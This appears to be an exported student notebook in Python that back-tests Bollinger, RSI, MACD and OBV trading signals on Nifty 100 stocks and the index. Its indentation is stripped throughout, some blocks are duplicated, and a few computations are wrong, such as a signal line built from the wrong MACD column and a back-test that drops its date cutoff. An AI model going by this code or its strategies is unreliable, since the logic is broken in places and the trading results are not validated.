#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, RSI", "Bollinger Middle Band; RSI > 50", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 51 out of 100 (no where close to 66% thats expected)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger RSI 50 Buy_Sell list.csv')
# +
# Lets try with Bolling and RSI but with RSI > 25
# determine the trading strategy for RSI
# RSI reading above the 25 level is considered as a positive momentum
# RSI reading below the 25 level is considered negative momentum
daily_data_back_test['TradingStrategyRSI_revised'] = np.where(daily_data_back_test['rsi'] > 25, "positive", "negative")
# REMOVE THE EFFECT OF OBV AND SEE IF WE GET A POSITIVE WAY FORWARD - SO JUST BOLLING AND RSI (with RSI > 30 for Buy call)
df1_grouped = daily_data_back_test.groupby('Symbol')
COMBINED = [0]
for group_keys, df_group in df1_grouped:
i = 0
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if i == 0 :
COMBINED.append("WAIT")
else:
if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
COMBINED.append("ENTER")
else:
COMBINED.append("SELL")
else:
COMBINED.append("WAIT")
i = i + 1
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_back_test['TradingStrategyCombined_bol_rsi_revised'] = dataframe_COMBINED_corrected['COMBINED'].values
# REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 10000 # investment of 10 lakhs for 100 stocks
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "SELL":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "ENTER":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
i = 0
add_rows_list=[]
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# # SUMMARIZING THE VARIOUS STRATEGIES FOR STOCKS
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, RSI", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger RSI 25 Buy_Sell list.csv')
# # NIFTY READ & CALCULATE THE RETURNS OVER THE INVESTMENT
# +
########### NIFTY READ
# -
# PERFORM THE DATA ANALYSIS FOR NIFTY - FROM START UNTIL 31-AUG-2020 AND THEN COMPARE THE RETURNS WITH NIFTY AND WHATS IN MY STRATEGY
raw_daily_nifty100 = pd.read_excel(r"D:\Personal\Analytics course\IPBA\Case Study\hundred\Index_NIFTY 100.xlsx")
raw_daily_nifty100
# #### Read the additional Nifty data for Oct and Nov 2020
raw_daily_nifty100_oct_nov = pd.read_excel(r"D:\Personal\Analytics course\IPBA\Case Study\additional data\Index_NIFTY 100.xlsx")
raw_daily_nifty100_oct_nov['Date']
# remove the 01-Oct-2020 data row in the dataframe so that we can then append the 2 data frames
raw_daily_nifty100_oct_nov_corrected = raw_daily_nifty100_oct_nov[raw_daily_nifty100_oct_nov['Date'] > "2020-10-01"]
raw_daily_nifty100_oct_nov_corrected.head(10)
# append the oct_nov 2020 data into existing daily_data
temp_df = raw_daily_nifty100
daily_nifty100 = pd.DataFrame(temp_df.append(raw_daily_nifty100_oct_nov_corrected, ignore_index = True))
daily_nifty100.shape
daily_nifty100.isnull().sum()
# +
# to calculate the simple moving average - 5, 10 , 50, 100, 200 days
daily_nifty100['SMA-5'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=5).mean())
daily_nifty100['SMA-10'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=10).mean())
daily_nifty100['SMA-50'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=50).mean())
daily_nifty100['SMA-100'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=100).mean())
daily_nifty100['SMA-200'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=200).mean())
# to calculate the exponential moving average - 5, 10 , 50, 100, 200 days
daily_nifty100['EMA-5'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=5).mean())
daily_nifty100['EMA-10'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=10).mean())
daily_nifty100['EMA-50'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=50).mean())
daily_nifty100['EMA-100'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=100).mean())
daily_nifty100['EMA-200'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=200).mean())
# calculcate RSI - Relative strength index
change = daily_nifty100['Close'].transform(lambda x:x.diff())
gain = change.mask(change < 0, 0)
loss = change.mask (change > 0, 0)
average_gain= gain.rolling(window = 14).mean().shift()
average_loss= loss.rolling(window = 14).mean().shift()
relativestrength = abs(average_gain / average_loss)
rsi = 100 - (100/(1+relativestrength))
daily_nifty100['rsi'] = rsi.shift(-1) # move up since the current column is already on next row due to rolling function
# calculate MACD
# MACD = 12-day EMA - 26-day EMA
daily_nifty100['ema12'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=12).mean())
daily_nifty100['ema26'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=26).mean())
daily_nifty100['macd'] = daily_nifty100['ema12'] - daily_nifty100['ema26']
## for cross over - calculate macd9
daily_nifty100['macd9'] = daily_nifty100['macd'].transform(lambda x:x.ewm(span=9).mean())
# calculate bollinger band
daily_nifty100['SMA-20'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=20).mean())
daily_nifty100['stddev-20'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=20).std())
daily_nifty100['Bollinger-UpperBand'] = daily_nifty100['SMA-20'] + 2*daily_nifty100['stddev-20']
daily_nifty100['Bollinger-LowerBand'] = daily_nifty100['SMA-20'] - 2*daily_nifty100['stddev-20']
# Calculate the OBV - based on price change, denote whether the volume needs to be added or subtracted in a new column - store it as list in OBV
df_nifty = daily_nifty100
i = 0
OBV = [0]
for row_index, row in df_nifty.iterrows():
if i <= df_nifty.index[-1] :
if i == 0 :
OBV.append(df_nifty.loc[row_index, 'Volume'])
else :
if df_nifty.loc[row_index, 'Close'] > df_nifty.loc[row_index - 1, 'Close'] :
OBV.append(df_nifty.loc[row_index, 'Volume'])
if df_nifty.loc[row_index, 'Close'] == df_nifty.loc[row_index - 1, 'Close'] :
OBV.append(0)
if df_nifty.loc[row_index, 'Close'] < df_nifty.loc[row_index - 1, 'Close'] :
OBV.append(-df_nifty.loc[row_index, 'Volume'])
i = i + 1
# convert the series to dataframe with column as OBV
dataframe_OBV = pd.DataFrame(OBV,columns=['OBV'])
dataframe_OBV
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_OBV_corrected = dataframe_OBV[1:]
dataframe_OBV_corrected.tail()
# add the non-cumulative OBV value to the existing daily_data dataframe
daily_nifty100['OBV Non-Cum'] = dataframe_OBV_corrected['OBV'].values
# do the cumulative sum based on the grouping iof each symbol to get the OBV for each Symbol
daily_nifty100['OBV'] = daily_nifty100['OBV Non-Cum'].cumsum()
daily_nifty100.head(20)
# -
daily_nifty100.isnull().sum()
# +
# determine Bearish or Bullish market and the trade strategy based on macd and macd9
# if macd > macd9, "bullish" and "buy"
# if macd < macd9, "bearish" and "sell"
daily_nifty100['TradingStrategymacd'] = np.where(daily_nifty100['macd'] > daily_nifty100['macd9'], "Buy", "Sell")
# determine the trading strategy for Bollinger
# Buy - first trade confirmation we need is for the price to break and close above the middle Bollinger band
# Sell - Close price drops from a Buy region of y/day to below the middle Bollinger band
daily_nifty100['TradingStrategyBollinger'] = np.where(daily_nifty100['Close'] >= daily_nifty100['SMA-20'], "Buy", "Sell")
# determine the trading strategy for RSI
# RSI reading above the 50 level is considered as a positive momentum
# RSI reading below the 50 level is considered negative momentum
daily_nifty100['TradingStrategyRSI'] = np.where(daily_nifty100['rsi'] > 50, "positive", "negative")
# determine the trading strategy for OBV
# Buy at the market once you see volume confirming the price
daily_nifty100['TradingStrategyOBV'] = np.where((daily_nifty100['OBV'] > daily_nifty100['OBV'].shift(1)) & (daily_nifty100['OBV'] > 0), "Buy", "Sell")
# +
# HIDE THE PROTECTIVE STOP LOSS BELOW THE BOLLINGER BAND
# The logical place to hide your protective stop loss is below the lower Bollinger band.
# A break below the lower BB will invalidate our trade idea, and we want to minimize our losses.
# STRATEGY FOR EXIT FROM THE MARKET (MAKE A SELL DECISION)
# A break below the lower Bollinger Band is a good signal for a possible reversal, so cash out profits
daily_nifty100['STOP'] = np.where((daily_nifty100['Close'] < daily_nifty100['Bollinger-LowerBand']), "STOP", "WAIT")
# +
# COMBINED STRATEGY TO ENTER THE MARKET (MAKE A BUY DECISION)
# Step #1: Price needs to Break and Close above the middle Bollinger Band
# Step #2: Wait for the RSI indicator to trade above the 50 level if it doesn’t already
# Step #3: Wait for the OBV indicator to rise. Buy at the market once you see volume confirming the price
# HIDE THE PROTECTIVE STOP LOSS BELOW THE BOLLINGER BAND
# The logical place to hide your protective stop loss is below the lower Bollinger band.
# A break below the lower BB will invalidate our trade idea, and we want to minimize our losses.
# STRATEGY FOR EXIT FROM THE MARKET (MAKE A SELL DECISION)
# A break below the lower Bollinger Band is a good signal for a possible reversal, so we want to cash out our profits
df_nifty = daily_nifty100
COMBINED = [0]
i = 0
for row_index, row in df_nifty.iterrows():
if i <= df_nifty.index[-1] :
if i == 0 :
COMBINED.append("WAIT")
else:
if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_nifty.loc[row_index, 'TradingStrategyRSI'] == "positive":
if df_nifty.loc[row_index, 'TradingStrategyOBV'] == "Buy":
COMBINED.append("ENTER")
else:
COMBINED.append("SELL")
else:
COMBINED.append("SELL")
else:
COMBINED.append("WAIT")
i = i + 1
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_nifty100['TradingStrategyCombined'] = dataframe_COMBINED_corrected['COMBINED'].values
# -
# # BACK-TESTING FOR NIFTY UNTIL 28-AUG-2020 (10 YEARS)
## FOR BACK-TESTING FOR THE PERIOD FROM START UNTIL 31-AUG-2020
## SELECT THE DAILY_DATA TO REFLECT JUST THIS DATA AND NOT THE DATA FROM 01-SEP-2020
mask = (daily_nifty100['Date'] <= "2020-08-28")
daily_nifty_back_test = daily_nifty100[mask]
# BACK-TESTING FOR 10 YEARS - for nifty
# MACD - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df_nifty = daily_nifty_back_test
Back_Test_10yrs = []
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 1000000 # investment of 10 lakhs
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_nifty.iterrows():
if i <= df_nifty.index[-1] :
if next_step == 0:
if df_nifty.loc[row_index, 'TradingStrategymacd'] == "Sell":
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append("Sell")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_nifty.loc[row_index, 'TradingStrategymacd'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append("Buy")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# +
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 4
Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
# move the list to dataframe
Buy_Sell_dataframe = []
Buy_Sell_dataframe = pd.DataFrame(Buy_Sell_list)
Buy_Sell_dataframe.columns = ['Date', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe ['Value'] = Buy_Sell_dataframe ['Price'] * Buy_Sell_dataframe ['Qty']
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
last_txn = Buy_Sell_dataframe.tail(1)['Txn']
last_qty = Buy_Sell_dataframe.tail(1)['Qty'].values[0]
if (last_txn == "Buy").bool():
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append("Sell") # Sell
price = daily_nifty_back_test[(daily_nifty_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
# add the rows to dataframe which are in Buy position but have not been sold.
n = 5
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe, add_rows_df])
# -
Buy_Sell_dataframe.tail(1)['Qty'].values[0]
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Nifty100", "macd", "(12-26)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Nifty100 MACD 1226 Buy_Sell list.csv')
# +
# BACK-TESTING FOR 10 YEARS - NIFTY
# RSI>25 and Bollinger - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df_nifty = daily_nifty_back_test
daily_nifty_back_test['TradingStrategyRSI_revised'] = np.where(daily_nifty_back_test['rsi'] > 25, "positive", "negative")
Back_Test_10yrs = []
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 1000000 # investment of 10 lakhs across 100 stocks
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_nifty.iterrows():
if i <= df_nifty.index[-1] :
if next_step == 0:
if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Sell":
if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "negative":
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append("Sell")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append("Buy")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 4
Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
# move the list to dataframe
Buy_Sell_dataframe = []
Buy_Sell_dataframe = pd.DataFrame(Buy_Sell_list)
Buy_Sell_dataframe.columns = ['Date', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe ['Value'] = Buy_Sell_dataframe ['Price'] * Buy_Sell_dataframe ['Qty']
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
last_txn = Buy_Sell_dataframe.tail(1)['Txn']
if (last_txn == "Buy").bool():
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append("Sell") # Sell
price = daily_nifty_back_test['Close'].tail(1).values[0]
add_rows_list.append(price) # Close price per the last date for that stock
qty = Buy_Sell_dataframe.tail(1)['Qty'].values[0]
add_rows_list.append(qty) # qty
value = price * qty
add_rows_list.append(value)
# add the rows to dataframe which are in Buy position but have not been sold.
n = 5
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe, add_rows_df])
# -
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Nifty100", "Bollinger, RSI", "Middle Band; RSI>25", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(20)
Summary_Report_df.head(20)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Nifty100 Bollinger RSI 25 Buy_Sell list.csv')
# +
# BACK-TESTING FOR 10 YEARS - for NIFTY
# RSI>25 and MACD (4,15 - macd9 - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
daily_nifty_back_test = daily_nifty100
# calculate MACD
# MACD = 4-day EMA - 15-day EMA
daily_nifty_back_test['ema4'] = daily_nifty_back_test['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_nifty_back_test['ema15'] = daily_nifty_back_test['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_nifty_back_test['macd_revised'] = daily_nifty_back_test['ema4'] - daily_nifty_back_test['ema15']
## for cross over - calculate macd9
daily_nifty_back_test['macd9'] = daily_nifty_back_test['macd'].transform(lambda x:x.ewm(span=9).mean())
# determine Bearish or Bullish market and the trade strategy based on macd and macd9
# if macd > macd9, "bullish" and "buy"
# if macd < macd9, "bearish" and "sell"
daily_nifty_back_test['TradingStrategymacd_revised'] = np.where(daily_nifty_back_test['macd_revised'] > daily_nifty_back_test['macd9'], "Buy", "Sell")
daily_nifty_back_test['TradingStrategyRSI_revised'] = np.where(daily_nifty_back_test['rsi'] > 25, "positive", "negative")
df_nifty = daily_nifty_back_test
Back_Test_10yrs = []
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 1000000 # investment of 10 lakhs across 100 stocks
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_nifty.iterrows():
if i <= df_nifty.index[-1] :
if next_step == 0:
if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "negative":
if df_nifty.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append("Sell")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
if df_nifty.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs.append(row['Date'])
Back_Test_10yrs.append("Buy")
Back_Test_10yrs.append(row['Close'])
Back_Test_10yrs.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 4
Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
# move the list to dataframe
Buy_Sell_dataframe = []
Buy_Sell_dataframe = pd.DataFrame(Buy_Sell_list)
Buy_Sell_dataframe.columns = ['Date', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe ['Value'] = Buy_Sell_dataframe ['Price'] * Buy_Sell_dataframe ['Qty']
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
last_txn = Buy_Sell_dataframe.tail(1)['Txn']
if (last_txn == "Buy").bool():
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append("Sell") # Sell
price = daily_nifty_back_test['Close'].tail(1).values[0]
add_rows_list.append(price) # Close price per the last date for that stock
qty = Buy_Sell_dataframe.tail(1)['Qty'].values[0]
add_rows_list.append(qty) # qty
value = price * qty
add_rows_list.append(value)
# add the rows to dataframe which are in Buy position but have not been sold.
n = 5
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe, add_rows_df])
# -
# # CONSOLIDATING THE RETURNS INCLUDING NIFTY
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Nifty100", "RSI, MACD", "RSI>25, MACD (4,15) - 9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
